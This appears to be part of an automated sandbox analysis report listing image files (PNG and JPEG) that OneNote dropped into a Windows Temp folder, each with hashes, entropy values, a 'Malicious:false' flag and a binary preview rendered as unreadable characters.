                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8862C162-75E6-4B63-B17C-2229F9B7DBF2}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{887A97ED-E917-4EB6-83AC-CF93A96D5CE5}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):95763
                                                                                                                                            Entropy (8bit):7.931689087616878
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                                                            MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                                                            SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                                                            SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                                                            SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{89328AA8-8E21-41A6-8FE1-337BD67563C8}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27862
                                                                                                                                            Entropy (8bit):7.238903610770013
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                            MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                            SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                            SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                            SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8A004662-D8C5-4596-85CD-2D924AB453A9}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8B68F525-C988-47D7-A05D-0F6EB368C3B1}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39010
                                                                                                                                            Entropy (8bit):7.362726513389497
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                            MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                            SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                            SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                            SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8D5A0AC3-C639-4D8C-8FF6-1A4068F15397}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8DA1112A-94C3-4EC1-AA4E-F6D8E2607885}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8E822D1E-E102-4CC7-8221-2F009F3371E3}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):53259
                                                                                                                                            Entropy (8bit):7.651662052139301
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                            MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                            SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                            SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                            SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8EFBAB84-E3F0-4A03-89A1-E0E14235ECE4}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8FB7EFF9-6F6C-454C-825D-DDFA0E46BB3B}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2898
                                                                                                                                            Entropy (8bit):7.551512280854713
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                                                            MD5:7C7D9922101488124D2E4666709198AC
                                                                                                                                            SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                                                            SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                                                            SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8FFD2920-29DA-45A8-890B-8D4D0CB8FCFE}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):68633
                                                                                                                                            Entropy (8bit):7.709776384921022
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                            MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                            SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                            SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                            SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9157688D-25FF-44C2-900F-BCC615544D2D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1547
                                                                                                                                            Entropy (8bit):6.4194805172468286
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                                                            MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                                                            SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                                                            SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                                                            SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{915D4423-B9AE-4035-A162-1EFF44D8C4CD}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
